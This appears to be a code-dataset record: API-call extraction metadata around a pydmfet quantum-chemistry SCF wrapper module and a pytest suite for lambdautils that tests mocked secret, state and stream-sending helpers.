| [((2218, 2280), 'lifelines.utils._preprocess_inputs', '_preprocess_inputs', (['durations', 'event_observed', 'timeline', 'entry'], {}), '(durations, event_observed, timeline, entry)\n', (2236, 2280), False, 'from lifelines.utils import _preprocess_inputs, _additive_estimate, StatError, inv_normal_cdf, median_survival_times\n'), ((2497, 2608), 'lifelines.utils._additive_estimate', '_additive_estimate', (['self.event_table', 'self.timeline', 'self._additive_f', 'self._additive_var', 'left_censorship'], {}), '(self.event_table, self.timeline, self._additive_f, self.\n _additive_var, left_censorship)\n', (2515, 2608), False, 'from lifelines.utils import _preprocess_inputs, _additive_estimate, StatError, inv_normal_cdf, median_survival_times\n'), ((3811, 3882), 'lifelines.utils.median_survival_times', 'median_survival_times', (['self.__estimate'], {'left_censorship': 'left_censorship'}), '(self.__estimate, left_censorship=left_censorship)\n', (3832, 3882), False, 'from lifelines.utils import _preprocess_inputs, _additive_estimate, StatError, inv_normal_cdf, median_survival_times\n'), ((4247, 4265), 'lifelines.plotting.plot_loglogs', 'plot_loglogs', (['self'], {}), '(self)\n', (4259, 4265), False, 'from lifelines.plotting import plot_loglogs\n'), ((4451, 4486), 'lifelines.utils.inv_normal_cdf', 'inv_normal_cdf', (['((1.0 + alpha) / 2.0)'], {}), '((1.0 + alpha) / 2.0)\n', (4465, 4486), False, 'from lifelines.utils import _preprocess_inputs, _additive_estimate, StatError, inv_normal_cdf, median_survival_times\n'), ((4498, 4531), 'pandas.DataFrame', 'pd.DataFrame', ([], {'index': 'self.timeline'}), '(index=self.timeline)\n', (4510, 4531), True, 'import pandas as pd\n'), ((4544, 4574), 'numpy.log', 'np.log', (['self.__estimate.values'], {}), '(self.__estimate.values)\n', (4550, 4574), True, 'import numpy as np\n'), ((5050, 5094), 'numpy.seterr', 'np.seterr', ([], {'invalid': '"""ignore"""', 'divide': '"""ignore"""'}), "(invalid='ignore', divide='ignore')\n", (5059, 5094), True, 'import numpy as np\n'), ((5219, 5245), 'numpy.seterr', 'np.seterr', ([], {'divide': '"""ignore"""'}), "(divide='ignore')\n", (5228, 5245), True, 'import numpy as np\n'), ((5111, 5138), 'numpy.log', 'np.log', (['(population - deaths)'], {}), '(population - deaths)\n', (5117, 5138), True, 'import numpy as np\n'), ((5141, 5159), 'numpy.log', 'np.log', (['population'], {}), '(population)\n', (5147, 5159), True, 'import numpy as np\n'), ((3364, 3519), 'lifelines.utils.StatError', 'StatError', (["('There are too few early truncation times and too many events. S(t)==0 for all t>%.1f. Recommend BreslowFlemingHarringtonFitter.'\n % ix)"], {}), "(\n 'There are too few early truncation times and too many events. S(t)==0 for all t>%.1f. Recommend BreslowFlemingHarringtonFitter.'\n % ix)\n", (3373, 3519), False, 'from lifelines.utils import _preprocess_inputs, _additive_estimate, StatError, inv_normal_cdf, median_survival_times\n'), ((3586, 3615), 'numpy.exp', 'np.exp', (['log_survival_function'], {}), '(log_survival_function)\n', (3592, 3615), True, 'import numpy as np\n'), ((4830, 4840), 'numpy.log', 'np.log', (['(-v)'], {}), '(-v)\n', (4836, 4840), True, 'import numpy as np\n'), ((4924, 4934), 'numpy.log', 'np.log', (['(-v)'], {}), '(-v)\n', (4930, 4934), True, 'import numpy as np\n'), ((4852, 4875), 'numpy.sqrt', 'np.sqrt', (['cumulative_sq_'], {}), '(cumulative_sq_)\n', (4859, 4875), True, 'import numpy as np\n'), ((4946, 4969), 'numpy.sqrt', 'np.sqrt', (['cumulative_sq_'], {}), '(cumulative_sq_)\n', (4953, 4969), True, 'import numpy as np\n')] |
import numpy as np
from pydmfet import tools
from .fermi import find_efermi, entropy_corr
from pyscf import ao2mo, gto, scf, dft, lib
from pydmfet.qcwrap import fermi
import time
from functools import reduce
def scf_oei( OEI, Norb, Nelec, smear_sigma = 0.0):
OEI = 0.5*(OEI.T + OEI)
eigenvals, eigenvecs = np.linalg.eigh( OEI )
idx = np.argmax(abs(eigenvecs), axis=0)
eigenvecs[:,eigenvecs[ idx, np.arange(len(eigenvals)) ]<0] *= -1
Nocc = Nelec//2 #closed shell
e_homo = eigenvals[Nocc-1]
e_lumo = eigenvals[Nocc]
print ('HOMO: ', e_homo, 'LUMO: ', e_lumo)
print ("mo_energy:")
print (eigenvals[:Nocc+5])
e_fermi = e_homo
mo_occ = np.zeros((Norb))
if(smear_sigma < 1e-8): #T=0
mo_occ[:Nocc] = 1.0
else: #finite T
e_fermi, mo_occ = find_efermi(eigenvals, smear_sigma, Nocc, Norb)
mo_occ*=2.0 #closed shell
Ne_error = np.sum(mo_occ) - Nelec
if(Ne_error > 1e-8):
print ('Ne error = ', Ne_error)
print ("fermi energy: ", e_fermi)
np.set_printoptions(precision=4)
flag = mo_occ > 1e-4
print (mo_occ[flag])
np.set_printoptions()
RDM1 = reduce(np.dot, (eigenvecs, np.diag(mo_occ), eigenvecs.T))
RDM1 = (RDM1.T + RDM1)/2.0
energy = np.trace(np.dot(RDM1,OEI))
es = entropy_corr(mo_occ, smear_sigma)
print ('entropy correction: ', es)
energy += es
print ('e_tot = ', energy)
return ( energy, RDM1, eigenvecs, eigenvals, mo_occ )
# The following is deprecated!
class scf_pyscf():
'''
subspace scf
wrapper for scf module of pyscf
'''
def __init__(self, Ne, Norb, mol=None, oei=None, tei=None, ovlp=1, dm0=None, coredm=0, ao2sub=None, mf_method='HF'):
self.mol = mol
self.Ne = Ne
self.Norb = Norb
self.method = mf_method
self.oei = oei
self.tei = tei
self.ovlp = ovlp
self.dm0 = dm0
self.coredm = coredm
self.ao2sub = ao2sub
self.method = mf_method.lower()
self.mf = None
if(self.mol is None):
#what molecule does not matter
self.mol = gto.Mole()
self.mol.build( verbose=0 )
self.mol.atom.append(('C', (0, 0, 0)))
#adjust number of electrons
self.mol.nelectron = Ne
if(self.tei is not None):
self.mol.incore_anyway = True
if(self.method == 'hf'):
self.mf = scf.RHF(self.mol)
self.prep_rhf()
else:
self.mf = scf.RKS(self.mol)
self.mf.xc = self.method
self.prep_rhf()
self.prep_rks()
self.elec_energy = 0.0
self.rdm1 = None
self.mo_coeff = None
self.mo_energy = None
self.mo_occ = None
def prep_rhf(self):
if(self.ovlp == 1):
self.mf.get_ovlp = lambda *args: np.eye( self.Norb )
if(self.oei is not None):
self.mf.get_hcore = lambda *args: self.oei
if(self.tei is not None):
self.mf._eri = ao2mo.restore(8, self.tei, self.Norb)
def prep_rks(self):
if(self.ao2sub is None):
return
#overload dft.rks.get_veff if necessary
self.mf.get_veff = get_veff_rks_decorator(self.ao2sub, self.coredm)
def kernel(self):
self.mf.kernel(self.dm0)
if ( self.mf.converged == False ):
raise Exception("scf not converged!")
rdm1 = self.mf.make_rdm1()
self.rdm1 = 0.5*(rdm1.T + rdm1)
self.elec_energy = self.mf.energy_elec(self.rdm1)[0]
self.mo_coeff = self.mf.mo_coeff
self.mo_energy = self.mf.mo_energy
self.mo_occ = self.mf.mo_occ
def get_veff_rks_decorator(ao2sub, coredm):
def get_veff(ks, mol=None, dm=None, dm_last=0, vhf_last=0, hermi=1):
if mol is None: mol = ks.mol
if dm is None: dm = ks.make_rdm1()
dm_sub = np.asarray(dm) + coredm
dm_ao = tools.dm_sub2ao(dm_sub, ao2sub)
if hasattr(dm, 'mo_coeff'):
mo_coeff_sub = dm.mo_coeff
mo_occ_sub = dm.mo_occ
mo_coeff_ao = tools.mo_sub2ao(mo_coeff_sub, ao2sub)
mo_occ_ao = mo_occ_sub
dm_ao = lib.tag_array(dm_ao, mo_coeff=mo_coeff_ao, mo_occ=mo_occ_ao)
n, exc, vxc_ao, hyb = get_vxc(ks, mol, dm_ao)
vxc = tools.op_ao2sub(vxc_ao, ao2sub)
vj = None
vk = None
if abs(hyb) < 1e-10:
if (ks._eri is None and ks.direct_scf and
getattr(vhf_last, 'vj', None) is not None):
ddm = numpy.asarray(dm) - numpy.asarray(dm_last)
vj = ks.get_jk(mol, ddm, hermi)[0]
vj += vhf_last.vj
else:
vj = ks.get_jk(mol, dm, hermi)[0]
vxc += vj
else:
if (ks._eri is None and ks.direct_scf and
getattr(vhf_last, 'vk', None) is not None):
ddm = numpy.asarray(dm) - numpy.asarray(dm_last)
vj, vk = ks.get_jk(mol, ddm, hermi)
vj += vhf_last.vj
vk += vhf_last.vk
else:
vj, vk = ks.get_jk(mol, dm, hermi)
vxc += vj - vk * (hyb * .5)
exc -= np.einsum('ij,ji', dm, vk) * .5 * hyb*.5
ecoul = np.einsum('ij,ji', dm, vj) * .5
vxc = lib.tag_array(vxc, ecoul=ecoul, exc=exc, vj=vj, vk=vk)
return vxc
return get_veff
def get_vxc(ks, mol, dm, hermi=1):
ground_state = (isinstance(dm, numpy.ndarray) and dm.ndim == 2)
if(not ground_state):
raise Exception("fatal error")
if ks.grids.coords is None:
ks.grids.build(with_non0tab=True)
if ks.small_rho_cutoff > 1e-20 and ground_state:
# Filter grids the first time setup grids
t0 = (time.clock(), time.time())
ks.grids = dft.rks.prune_small_rho_grids_(ks, mol, dm, ks.grids)
t1 = tools.timer("prune grid",t0)
if hermi == 2: # because rho = 0
n, exc, vxc = 0, 0, 0
else:
n, exc, vxc = ks._numint.nr_rks(mol, ks.grids, ks.xc, dm)
hyb = ks._numint.hybrid_coeff(ks.xc, spin=mol.spin)
return n, exc, vxc, hyb
'''
def rhf(mol, OEI, TEI, Norb, Nelec, OneDM0=None ):
# Get the RHF solution
OEI = 0.5*(OEI.T + OEI)
#mol = gto.Mole()
#mol.max_memory = 8000
#mol.build( verbose=0 )
#mol.atom.append(('C', (0, 0, 0)))
mol.nelectron = Nelec
mol.incore_anyway = True
mf = pyscf_scf.RHF( mol )
mf.get_hcore = lambda *args: OEI
mf.get_ovlp = lambda *args: np.eye( Norb )
mf._eri = ao2mo.restore(8, TEI, Norb)
mf.max_cycle = 100
#mf.conv_tol = 1e-8
#adiis = pyscf_scf.diis.ADIIS()
#mf.diis = adiis
#mf.verbose = 5
mf.kernel(OneDM0)
if ( mf.converged == False ):
#RDM1 = mf.make_rdm1()
#cdiis = pyscf_scf.diis.SCF_DIIS()
#mf.diis = cdiis
#mf.max_cycle = 200
#mf.kernel(RDM1)
if ( mf.converged == False ):
raise Exception(" rhf not converged!")
return mf
def rks(mol, OEI, TEI, Norb, Nelec, xcfunc, OneDM0=None ):
# Get the RKS solution
OEI = 0.5*(OEI.T + OEI)
#mol = gto.Mole()
#mol.build( verbose=5 )
#mol.atom.append(('C', (0, 0, 0)))
mol.nelectron = Nelec
# mol.incore_anyway = True
mf = pyscf_scf.RKS( mol )
mf.xc = xcfunc.lower()
# mf.get_hcore = lambda *args: OEI
# mf.get_ovlp = lambda *args: np.eye( Norb )
# mf._eri = ao2mo.restore(8, TEI, Norb)
OneDM0 = None
mf.kernel( OneDM0 )
if ( mf.converged == False ):
raise Exception(" rks not converged!")
return mf
def scf(mol, OEI, TEI, Norb, Nelec, OneDM0=None, mf_method = 'HF' ):
# Get the mean-field solution
if(mf_method.lower() == 'hf'):
mf = rhf(mol, OEI, TEI, Norb, Nelec, OneDM0 )
else:
mf = rks(mol, OEI, TEI, Norb, Nelec, mf_method ,OneDM0 )
RDM1 = mf.make_rdm1()
RDM1 = 0.5*(RDM1.T + RDM1)
mo_coeff = mf.mo_coeff
mo_energy = mf.mo_energy
energy = mf.energy_elec(RDM1)[0]
mo = np.zeros([Norb,Norb+1],dtype=float)
mo[:,:-1] = mo_coeff
mo[:,-1] = mo_energy
#print "mo energy"
#print mf.mo_energy
#tools.MatPrint(mf.get_fock(),"fock")
#JK = mf.get_veff(None, dm=RDM1)
#tools.MatPrint(JK,"JK")
#tools.MatPrint(np.dot(mf.get_fock(), mf.mo_coeff),"test")
#tools.MatPrint(mf.mo_coeff,"mo_coeff")
return (energy, RDM1, mo)
'''
| [
"time.clock",
"numpy.einsum",
"pyscf.ao2mo.restore",
"pydmfet.tools.op_ao2sub",
"pydmfet.tools.timer",
"numpy.asarray",
"numpy.dot",
"pydmfet.tools.dm_sub2ao",
"numpy.linalg.eigh",
"pyscf.dft.rks.prune_small_rho_grids_",
"pyscf.scf.RKS",
"numpy.eye",
"time.time",
"numpy.set_printoptions",
"pyscf.gto.Mole",
"pyscf.lib.tag_array",
"numpy.diag",
"numpy.sum",
"numpy.zeros",
"pyscf.scf.RHF",
"pydmfet.tools.mo_sub2ao"
]
| [((316, 335), 'numpy.linalg.eigh', 'np.linalg.eigh', (['OEI'], {}), '(OEI)\n', (330, 335), True, 'import numpy as np\n'), ((686, 700), 'numpy.zeros', 'np.zeros', (['Norb'], {}), '(Norb)\n', (694, 700), True, 'import numpy as np\n'), ((1036, 1068), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'precision': '(4)'}), '(precision=4)\n', (1055, 1068), True, 'import numpy as np\n'), ((1123, 1144), 'numpy.set_printoptions', 'np.set_printoptions', ([], {}), '()\n', (1142, 1144), True, 'import numpy as np\n'), ((906, 920), 'numpy.sum', 'np.sum', (['mo_occ'], {}), '(mo_occ)\n', (912, 920), True, 'import numpy as np\n'), ((1270, 1287), 'numpy.dot', 'np.dot', (['RDM1', 'OEI'], {}), '(RDM1, OEI)\n', (1276, 1287), True, 'import numpy as np\n'), ((3972, 4003), 'pydmfet.tools.dm_sub2ao', 'tools.dm_sub2ao', (['dm_sub', 'ao2sub'], {}), '(dm_sub, ao2sub)\n', (3987, 4003), False, 'from pydmfet import tools\n'), ((4365, 4396), 'pydmfet.tools.op_ao2sub', 'tools.op_ao2sub', (['vxc_ao', 'ao2sub'], {}), '(vxc_ao, ao2sub)\n', (4380, 4396), False, 'from pydmfet import tools\n'), ((5363, 5417), 'pyscf.lib.tag_array', 'lib.tag_array', (['vxc'], {'ecoul': 'ecoul', 'exc': 'exc', 'vj': 'vj', 'vk': 'vk'}), '(vxc, ecoul=ecoul, exc=exc, vj=vj, vk=vk)\n', (5376, 5417), False, 'from pyscf import ao2mo, gto, scf, dft, lib\n'), ((1185, 1200), 'numpy.diag', 'np.diag', (['mo_occ'], {}), '(mo_occ)\n', (1192, 1200), True, 'import numpy as np\n'), ((2149, 2159), 'pyscf.gto.Mole', 'gto.Mole', ([], {}), '()\n', (2157, 2159), False, 'from pyscf import ao2mo, gto, scf, dft, lib\n'), ((2453, 2470), 'pyscf.scf.RHF', 'scf.RHF', (['self.mol'], {}), '(self.mol)\n', (2460, 2470), False, 'from pyscf import ao2mo, gto, scf, dft, lib\n'), ((2535, 2552), 'pyscf.scf.RKS', 'scf.RKS', (['self.mol'], {}), '(self.mol)\n', (2542, 2552), False, 'from pyscf import ao2mo, gto, scf, dft, lib\n'), ((3058, 3095), 'pyscf.ao2mo.restore', 'ao2mo.restore', (['(8)', 'self.tei', 'self.Norb'], {}), '(8, self.tei, self.Norb)\n', (3071, 3095), False, 'from pyscf import ao2mo, gto, scf, dft, lib\n'), ((3932, 3946), 'numpy.asarray', 'np.asarray', (['dm'], {}), '(dm)\n', (3942, 3946), True, 'import numpy as np\n'), ((4142, 4179), 'pydmfet.tools.mo_sub2ao', 'tools.mo_sub2ao', (['mo_coeff_sub', 'ao2sub'], {}), '(mo_coeff_sub, ao2sub)\n', (4157, 4179), False, 'from pydmfet import tools\n'), ((4235, 4295), 'pyscf.lib.tag_array', 'lib.tag_array', (['dm_ao'], {'mo_coeff': 'mo_coeff_ao', 'mo_occ': 'mo_occ_ao'}), '(dm_ao, mo_coeff=mo_coeff_ao, mo_occ=mo_occ_ao)\n', (4248, 4295), False, 'from pyscf import ao2mo, gto, scf, dft, lib\n'), ((5316, 5342), 'numpy.einsum', 'np.einsum', (['"""ij,ji"""', 'dm', 'vj'], {}), "('ij,ji', dm, vj)\n", (5325, 5342), True, 'import numpy as np\n'), ((5884, 5937), 'pyscf.dft.rks.prune_small_rho_grids_', 'dft.rks.prune_small_rho_grids_', (['ks', 'mol', 'dm', 'ks.grids'], {}), '(ks, mol, dm, ks.grids)\n', (5914, 5937), False, 'from pyscf import ao2mo, gto, scf, dft, lib\n'), ((5955, 5984), 'pydmfet.tools.timer', 'tools.timer', (['"""prune grid"""', 't0'], {}), "('prune grid', t0)\n", (5966, 5984), False, 'from pydmfet import tools\n'), ((2888, 2905), 'numpy.eye', 'np.eye', (['self.Norb'], {}), '(self.Norb)\n', (2894, 2905), True, 'import numpy as np\n'), ((5834, 5846), 'time.clock', 'time.clock', ([], {}), '()\n', (5844, 5846), False, 'import time\n'), ((5848, 5859), 'time.time', 'time.time', ([], {}), '()\n', (5857, 5859), False, 'import time\n'), ((5258, 5284), 'numpy.einsum', 'np.einsum', (['"""ij,ji"""', 'dm', 'vk'], {}), "('ij,ji', dm, vk)\n", (5267, 5284), True, 'import numpy as np\n')] |
"""Unit tests."""
import inspect
import json
from mock import Mock
import os
import sys
import uuid
import pytest
# Add the lambda directory to the python library search path
lambda_dir = os.path.join(
os.path.dirname(inspect.getfile(inspect.currentframe())), '..')
sys.path.append(lambda_dir)
import lambdautils.utils
@pytest.mark.parametrize(
"key,environment,stage,namespace,table,nkey", [
("k", "e", "s", None, "e-s-secrets", "k"),
("k", "e", None, None, "e-dummystage-secrets", "k"),
("k", "e", None, "n", "e-dummystage-secrets", "n:k"),
("k", "e", "s", "n", "e-s-secrets", "n:k")])
def test_get_secret_from_vault(key, environment, stage, namespace, table, nkey,
boto3_resource, boto3_client, monkeypatch):
"""Gets a secret from the DynamoDB secrets vault."""
# Call to the DynamoDB client to retrieve the encrypted secret
monkeypatch.setattr("boto3.resource", boto3_resource)
monkeypatch.setattr("boto3.client", boto3_client)
secret = lambdautils.utils.get_secret(key,
namespace=namespace,
environment=environment,
stage=stage)
assert secret == "dummy"
boto3_client("dynamodb").get_item.assert_called_with(
TableName=table,
Key={"id": {"S": nkey}})
# Call to the KMS client to decrypt the secret
boto3_client('kms').decrypt.assert_called_with(CiphertextBlob="encrypted")
def test_get_secret_from_env(monkeypatch):
"""Get a secret from an (encrypted) environment variable."""
key = str(uuid.uuid4()).replace('-', '.')
value = str(uuid.uuid4())
monkeypatch.setenv(key.replace('.', '_').upper(), value)
secret = lambdautils.utils.get_secret(key)
assert secret == value
def test_get_setting(monkeypatch):
"""Should be an alias for get_secret."""
resp = str(uuid.uuid4())
arg = str(uuid.uuid4())
kwarg = str(uuid.uuid4())
get_secret = Mock(return_value=resp)
monkeypatch.setattr("lambdautils.state.get_secret", get_secret)
resp2 = lambdautils.state.get_setting(arg, kwarg=kwarg)
assert resp2 == resp
get_secret.assert_called_with(arg, kwarg=kwarg)
@pytest.mark.parametrize(
"key,environment,layer,stage,shard_id,namespace,table,consistent,nkey", [
("k", "e", "l", "s", None, None, "e-l-s-state", False, "k"),
("k", "e", "l", "s", None, "n", "e-l-s-state", False, "n:k"),
("k", "e", "l", "s", "s-012", "n", "e-l-s-state", True, "s-012:n:k"),
("k", "e", "l", "s", "s-0001", None, "e-l-s-state", True, "s-0001:k")])
def test_get_state(boto3_resource, monkeypatch, key, environment, layer,
stage, shard_id, namespace, table, consistent, nkey):
"""Get a state value from DynamoDB."""
monkeypatch.setattr("boto3.resource", boto3_resource)
lambdautils.utils.get_state(key, environment=environment, layer=layer,
stage=stage, shard_id=shard_id,
namespace=namespace,
consistent=consistent)
boto3_resource("dynamodb").Table.assert_called_with(table)
if consistent is None:
# The default setting: use consistent reads
consistent = True
boto3_resource("dynamodb").Table().get_item.assert_called_with(
Key={"id": nkey}, ConsistentRead=consistent)
def test_no_state_table(boto3_resource, monkeypatch):
"""Test accessing state variable without having a state table."""
monkeypatch.setattr("boto3.resource", boto3_resource)
monkeypatch.delenv("HUMILIS_ENVIRONMENT")
with pytest.raises(lambdautils.state.StateTableError):
lambdautils.utils.set_state("sample_state_key", "sample_state_value")
with pytest.raises(lambdautils.state.StateTableError):
lambdautils.utils.delete_state("sample_state_key")
with pytest.raises(lambdautils.state.StateTableError):
lambdautils.utils.get_state("sample_state_key")
@pytest.mark.parametrize(
"key,value,environment,layer,stage,shard_id,namespace,table,nkey", [
("k", "v", "e", "l", "s", None, None, "e-l-s-state", "k"),
("k", "v", "e", "l", "s", None, "n", "e-l-s-state", "n:k"),
("k", "v", "e", "l", "s", "s1", "n", "e-l-s-state", "s1:n:k"),
("k", "v", "e", "l", "s", "s2", None, "e-l-s-state", "s2:k")])
def test_set_state(boto3_resource, monkeypatch, key, value, environment, layer,
stage, shard_id, namespace, table, nkey):
"""Tests setting a state variable."""
monkeypatch.setattr("boto3.resource", boto3_resource)
lambdautils.utils.set_state(key, value, environment=environment,
layer=layer, stage=stage, shard_id=shard_id,
namespace=namespace)
boto3_resource("dynamodb").Table.assert_called_with(table)
boto3_resource("dynamodb").Table().put_item.assert_called_with(
Item={"id": nkey, "value": json.dumps(value)})
@pytest.mark.parametrize(
"key,environment,layer,stage,shard_id,namespace,table,nkey", [
("k", "e", "l", "s", None, None, "e-l-s-state", "k"),
("k", "e", "l", "s", None, "n", "e-l-s-state", "n:k"),
("k", "e", "l", "s", "s1", "n", "e-l-s-state", "s1:n:k"),
("k", "e", "l", "s", "s2", None, "e-l-s-state", "s2:k")])
def test_delete_state(boto3_resource, monkeypatch, key, environment,
layer, stage, shard_id, namespace, table, nkey):
"""Tests setting a state variable."""
monkeypatch.setattr("boto3.resource", boto3_resource)
lambdautils.utils.delete_state(key, environment=environment,
layer=layer, stage=stage, shard_id=shard_id,
namespace=namespace)
boto3_resource("dynamodb").Table.assert_called_with(table)
boto3_resource("dynamodb").Table().delete_item.assert_called_with(
Key={"id": nkey})
def test_sentry_monitor_bad_client(boto3_client, raven_client, context,
monkeypatch):
"""Test that sentry_monitor handles raven client errors gracefully."""
class ClientError(Exception):
pass
def raise_error(dsn):
raise ClientError
monkeypatch.setattr("raven.Client", Mock(side_effect=raise_error))
monkeypatch.setattr("boto3.client", boto3_client)
@lambdautils.utils.sentry_monitor(environment="dummyenv",
stage="dummystage")
def lambda_handler(event, context):
pass
lambda_handler(None, context)
raven_client.captureException.assert_not_called()
@pytest.mark.parametrize(
"kstream, fstream, rcalls, kcalls, fcalls, ev", [
("a", "b", 1, 0, 0, {"Records": [{}]}),
(None, "b", 1, 0, 0, {"Records": [{}]}),
(None, None, 1, 0, 0, None),
(None, None, 1, 0, 0, None),
("a", "b", 1, 0, 0, None),
("a", None, 1, 0, 0, None)])
def test_sentry_monitor_exception(
kstream, fstream, rcalls, kcalls, fcalls, ev,
boto3_client, raven_client, context, kinesis_event, monkeypatch):
"""Tests the sentry_monitor decorator when throwing an exception and
lacking an error stream where to dump the errors."""
if ev is None:
# Default to a Kinesis event
ev = kinesis_event
monkeypatch.setattr("boto3.client", boto3_client)
monkeypatch.setattr("raven.Client", Mock(return_value=raven_client))
monkeypatch.setattr("lambdautils.monitor.SentryHandler", Mock())
monkeypatch.setattr("lambdautils.utils.get_secret",
Mock(return_value="dummydsn"))
error_stream = {
"kinesis_stream": kstream,
"firehose_delivery_stream": fstream}
@lambdautils.utils.sentry_monitor(error_stream=error_stream)
def lambda_handler(event, context):
"""Raise an error."""
raise KeyError
with pytest.raises(KeyError):
lambda_handler(ev, context)
# Should have captured only 1 error:
# * The original KeyError
assert raven_client.captureException.call_count == rcalls
# And should have send the events to the Kinesis and FH error streams
assert boto3_client("kinesis").put_records.call_count == kcalls
assert boto3_client("firehose").put_record_batch.call_count == fcalls
def test_send_to_kinesis_stream(search_events, boto3_client, monkeypatch):
"""Tests sending events to a Kinesis stream."""
monkeypatch.setattr("boto3.client", boto3_client)
lambdautils.utils.send_to_kinesis_stream(search_events, "dummy_stream")
boto3_client("kinesis").put_records.call_count == 1
def test_send_to_delivery_stream(search_events, boto3_client, monkeypatch):
"""Tests sending events to a Firehose delivery stream."""
monkeypatch.setattr("boto3.client", boto3_client)
lambdautils.utils.send_to_delivery_stream(search_events, "dummy_stream")
boto3_client("firehose").put_record_batch.call_count == 1
@pytest.mark.parametrize("deserializer, embed_ts", [
[json.loads, False],
[json.loads, "kinesis_timestamp"],
[None, False]])
def test_unpack_kinesis_event(kinesis_event, deserializer, embed_ts):
"""Extracts json-serialized events from a Kinesis events."""
events, shard_id = lambdautils.utils.unpack_kinesis_event(
kinesis_event, deserializer=deserializer, embed_timestamp=embed_ts)
# There should be one event per kinesis record
assert len(events) == len(kinesis_event["Records"])
assert shard_id == kinesis_event["Records"][0]["eventID"].split(":")[0]
if embed_ts:
assert all(embed_ts in ev for ev in events)
| [
"mock.Mock",
"inspect.currentframe",
"json.dumps",
"uuid.uuid4",
"pytest.mark.parametrize",
"pytest.raises",
"sys.path.append"
]
| [((273, 300), 'sys.path.append', 'sys.path.append', (['lambda_dir'], {}), '(lambda_dir)\n', (288, 300), False, 'import sys\n'), ((330, 612), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""key,environment,stage,namespace,table,nkey"""', "[('k', 'e', 's', None, 'e-s-secrets', 'k'), ('k', 'e', None, None,\n 'e-dummystage-secrets', 'k'), ('k', 'e', None, 'n',\n 'e-dummystage-secrets', 'n:k'), ('k', 'e', 's', 'n', 'e-s-secrets', 'n:k')]"], {}), "('key,environment,stage,namespace,table,nkey', [('k',\n 'e', 's', None, 'e-s-secrets', 'k'), ('k', 'e', None, None,\n 'e-dummystage-secrets', 'k'), ('k', 'e', None, 'n',\n 'e-dummystage-secrets', 'n:k'), ('k', 'e', 's', 'n', 'e-s-secrets', 'n:k')]\n )\n", (353, 612), False, 'import pytest\n'), ((2272, 2654), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""key,environment,layer,stage,shard_id,namespace,table,consistent,nkey"""', "[('k', 'e', 'l', 's', None, None, 'e-l-s-state', False, 'k'), ('k', 'e',\n 'l', 's', None, 'n', 'e-l-s-state', False, 'n:k'), ('k', 'e', 'l', 's',\n 's-012', 'n', 'e-l-s-state', True, 's-012:n:k'), ('k', 'e', 'l', 's',\n 's-0001', None, 'e-l-s-state', True, 's-0001:k')]"], {}), "(\n 'key,environment,layer,stage,shard_id,namespace,table,consistent,nkey',\n [('k', 'e', 'l', 's', None, None, 'e-l-s-state', False, 'k'), ('k', 'e',\n 'l', 's', None, 'n', 'e-l-s-state', False, 'n:k'), ('k', 'e', 'l', 's',\n 's-012', 'n', 'e-l-s-state', True, 's-012:n:k'), ('k', 'e', 'l', 's',\n 's-0001', None, 'e-l-s-state', True, 's-0001:k')])\n", (2295, 2654), False, 'import pytest\n'), ((4060, 4418), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""key,value,environment,layer,stage,shard_id,namespace,table,nkey"""', "[('k', 'v', 'e', 'l', 's', None, None, 'e-l-s-state', 'k'), ('k', 'v', 'e',\n 'l', 's', None, 'n', 'e-l-s-state', 'n:k'), ('k', 'v', 'e', 'l', 's',\n 's1', 'n', 'e-l-s-state', 's1:n:k'), ('k', 'v', 'e', 'l', 's', 's2',\n None, 'e-l-s-state', 's2:k')]"], {}), "(\n 'key,value,environment,layer,stage,shard_id,namespace,table,nkey', [(\n 'k', 'v', 'e', 'l', 's', None, None, 'e-l-s-state', 'k'), ('k', 'v',\n 'e', 'l', 's', None, 'n', 'e-l-s-state', 'n:k'), ('k', 'v', 'e', 'l',\n 's', 's1', 'n', 'e-l-s-state', 's1:n:k'), ('k', 'v', 'e', 'l', 's',\n 's2', None, 'e-l-s-state', 's2:k')])\n", (4083, 4418), False, 'import pytest\n'), ((5064, 5395), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""key,environment,layer,stage,shard_id,namespace,table,nkey"""', "[('k', 'e', 'l', 's', None, None, 'e-l-s-state', 'k'), ('k', 'e', 'l', 's',\n None, 'n', 'e-l-s-state', 'n:k'), ('k', 'e', 'l', 's', 's1', 'n',\n 'e-l-s-state', 's1:n:k'), ('k', 'e', 'l', 's', 's2', None,\n 'e-l-s-state', 's2:k')]"], {}), "(\n 'key,environment,layer,stage,shard_id,namespace,table,nkey', [('k', 'e',\n 'l', 's', None, None, 'e-l-s-state', 'k'), ('k', 'e', 'l', 's', None,\n 'n', 'e-l-s-state', 'n:k'), ('k', 'e', 'l', 's', 's1', 'n',\n 'e-l-s-state', 's1:n:k'), ('k', 'e', 'l', 's', 's2', None,\n 'e-l-s-state', 's2:k')])\n", (5087, 5395), False, 'import pytest\n'), ((6705, 6985), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""kstream, fstream, rcalls, kcalls, fcalls, ev"""', "[('a', 'b', 1, 0, 0, {'Records': [{}]}), (None, 'b', 1, 0, 0, {'Records': [\n {}]}), (None, None, 1, 0, 0, None), (None, None, 1, 0, 0, None), ('a',\n 'b', 1, 0, 0, None), ('a', None, 1, 0, 0, None)]"], {}), "('kstream, fstream, rcalls, kcalls, fcalls, ev', [(\n 'a', 'b', 1, 0, 0, {'Records': [{}]}), (None, 'b', 1, 0, 0, {'Records':\n [{}]}), (None, None, 1, 0, 0, None), (None, None, 1, 0, 0, None), ('a',\n 'b', 1, 0, 0, None), ('a', None, 1, 0, 0, None)])\n", (6728, 6985), False, 'import pytest\n'), ((9046, 9173), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""deserializer, embed_ts"""', "[[json.loads, False], [json.loads, 'kinesis_timestamp'], [None, False]]"], {}), "('deserializer, embed_ts', [[json.loads, False], [\n json.loads, 'kinesis_timestamp'], [None, False]])\n", (9069, 9173), False, 'import pytest\n'), ((2040, 2063), 'mock.Mock', 'Mock', ([], {'return_value': 'resp'}), '(return_value=resp)\n', (2044, 2063), False, 'from mock import Mock\n'), ((1705, 1717), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (1715, 1717), False, 'import uuid\n'), ((1951, 1963), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (1961, 1963), False, 'import uuid\n'), ((1979, 1991), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (1989, 1991), False, 'import uuid\n'), ((2009, 2021), 